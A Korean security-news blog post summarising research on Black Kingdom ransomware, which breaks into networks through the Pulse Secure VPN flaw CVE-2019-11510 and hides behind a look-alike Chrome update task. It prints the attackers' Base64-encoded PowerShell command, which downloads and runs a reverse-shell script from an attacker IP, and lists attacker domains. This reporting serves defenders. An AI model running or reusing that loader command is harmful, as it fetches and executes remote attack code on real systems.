포스팅 내용

국내외 보안동향

Black Kingdom 랜섬웨어, PurseVPN 취약점을 악용하여 네트워크 공격해

Black Kingdom ransomware hacks networks with Pulse VPN flaws


Black Kingdom 랜섬웨어 운영자들이 패치되지 않은 Purse Secure VPN 소프트웨어를 사용하거나 네트워크에 대한 초기 접근 권한을 획득 가능한 기업을 공격하고 있는 것으로 나타났습니다.


이 악성코드는 허니팟에 걸려들어 연구원들이 이를 분석하고 공격자가 사용하는 전술을 문서화할 수 있었습니다.



랜섬웨어의 전술


이 랜섬웨어는 2019년 4월 패치된 Purse Secure VPN의 구 버전에 존재하는 치명적인 취약점인 CVE-2019-11510을 악용합니다. 


여러 기업에서는 익스플로잇이 공개된 이후에도 소프트웨어 업데이트를 진행하지 않아 미 정부에서 여러 차례 경고를 받았습니다. 


이에 공격자들은 이를 악용하기 시작했으며 일부 조직은 아직까지 취약한 버전을 사용하고 있는 것으로 나타났습니다.


폴란드의 사이버 보안 회사인 REDTEAM.PL은 Black Kingdom 운영자가 Pulse Secure VPN의 취약점을 악용하여 침투한 것을 발견했습니다.


조사 결과, 이 랜섬웨어는 구글 크롬의 합법적인 예약 작업으로 위장하여 지속성을 얻었습니다. 이 작업이 사용한 이름은 실제 구글 작업과 스펠링 하나만 달랐습니다.



GoogleUpdateTaskMachineUSA - Black Kingdom 작업

GoogleUpdateTaskMachineUA – 합법적인 구글 크롬 작업



REDTEAM.PL의 분석에 따르면 이 예약 작업은 해킹된 호스트에서 리버스 셸을 오픈하는데 사용되는 것으로 추측되는 “reverse.ps1”라는 스크립트를 가져오기 위해 PowerShell 창에 숨겨진 Base64로 인코딩된 문자열 코드를 실행합니다.



cversions_cache.ps1 스크립트:


$update = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQA4AC4AMQAzAC4ANAA5AC4AMQA3ADkALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAA=="


powershell.exe -exec bypass -nologo -Enc $update



REDTEAM.PL의 Adam Ziaja는 공격자가 제어하는 원격 서버에서 이 스크립트를 받아올 수 없었다며 페이로드가 전달되기 전 이 스크립트를 호스팅하는 서버가 차단된 것으로 보인다고 밝혔습니다.


“reverse.ps1”가 저장되어 있었던 IP 주소는 198.13.49[.]179로 Vultr의 자회사인 Choopa가 관리하고 있었습니다. 


이 회사는 사이버 범죄자들이 악성 툴을 호스팅하는데 사용하는 저렴한 VPS 서버를 제공하는 것으로 알려져 있습니다.


발견된 도메인 3개 중 마지막 도메인은 안드로이드 및 가상 화폐 채굴 악성코드를 호스팅하는 미국과 이탈리아에 위치한 다른 서버와 연결되어 있었습니다.



• host.cutestboty[.]com

• keepass.cutestboty[.]com

• anno1119[.]com

 


<이미지 출처: https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html>



최근 모습


Black Kingdom 랜섬웨어는 지난 2월 말 처음으로 발견되었습니다. 이 랜섬웨어는 암호화한 파일에 .DEMON 확장자를 붙였습니다.


샘플 분석 결과  REDTEAM.PL의 보고서에 기재된 것과 동일한 IP 주소에 연결했습니다. 


이는 비트코인 지갑으로 $10,000상당의 랜섬머니를 보낼 것을 요구했으며, 돈을 보내지 않을 경우 데이터는 파괴되거나 판매될 것이라 협박하는 랜섬노트를 드롭했습니다.

 


<이미지 출처: https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html>



공격자의 비트코인 주소를 확인 결과 빈 지갑과 두 번의 입금 거래가 발생한 후 총 $5,200 상당의 0.55 BTC가 들어있는 지갑을 발견했습니다.


현재 알약에서는 해당 악성코드 샘플에 대해 'Trojan.Ransom.Filecoder'으로 탐지 중에 있습니다.





출처:

https://www.bleepingcomputer.com/news/security/black-kingdom-ransomware-hacks-networks-with-pulse-vpn-flaws/

https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html

티스토리 방명록 작성
name password homepage